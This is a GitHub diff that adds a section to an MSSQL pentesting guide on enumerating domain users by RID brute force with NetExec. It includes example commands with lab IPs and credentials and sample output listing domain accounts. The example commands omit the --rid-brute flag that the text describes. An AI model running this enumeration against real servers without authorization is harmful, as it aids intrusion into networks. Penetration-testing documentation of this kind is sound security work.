File tree Expand file tree Collapse file tree 1 file changed +36
-0
lines changed
src/network-services-pentesting/pentesting-mssql-microsoft-sql-server Expand file tree Collapse file tree 1 file changed +36
-0
lines changed Original file line number Diff line number Diff line change @@ -79,6 +79,42 @@ msf> use windows/manage/mssql_local_auth_bypass
7979
8080### [ ** Brute force** ] ( ../../generic-hacking/brute-force.md#sql-server )
8181
82+ ### ** User Enumeration via RID Brute Force**
83+
84+ You can enumerate domain users through MSSQL by brute-forcing RIDs (Relative Identifiers). This technique is useful when you have valid credentials but limited privileges:
85+ ``` bash
86+ # Using NetExec (nxc) - formerly CrackMapExec
87+ nxc mssql < IP> --local-auth -u < username> -p ' <password>'
88+
89+ # Examples:
90+ nxc mssql 10.129.234.50 --local-auth -u sqlguest -p ' zDPBpaF4FywlqIv11vii'
91+ nxc mssql 10.10.10.59 -u sa -p ' P@ssw0rd'
92+
93+ # Without --local-auth for domain accounts
94+ nxc mssql 10.10.10.59 -u DOMAIN\\ user -p ' password'
95+ ```
96+
97+ Expected output:
98+
99+ ```
100+ [snippet]
101+ MSSQL 10.129.234.50 1433 DC 1104: REDELEGATE\Christine.Flanders
102+ MSSQL 10.129.234.50 1433 DC 1105: REDELEGATE\Marie.Curie
103+ MSSQL 10.129.234.50 1433 DC 1106: REDELEGATE\Helen.Frost
104+ MSSQL 10.129.234.50 1433 DC 1107: REDELEGATE\Michael.Pontiac
105+ MSSQL 10.129.234.50 1433 DC 1108: REDELEGATE\Mallory.Roberts
106+ MSSQL 10.129.234.50 1433 DC 1109: REDELEGATE\James.Dinkleberg
107+ [snippet]
108+ ```
109+
110+ ** Parameters:**
111+ - ` --local-auth ` : Use local authentication instead of domain
112+ - ` --rid-brute <max_rid> ` : Brute force RIDs up to the specified number (default: 4000)
113+ - ` -u ` : Username
114+ - ` -p ` : Password
115+
116+ This technique will enumerate users by querying the MSSQL server for account information associated with sequential RIDs.
117+
82118### Manual Enumeration
83119
84120#### Login
You can’t perform that action at this time.
0 commit comments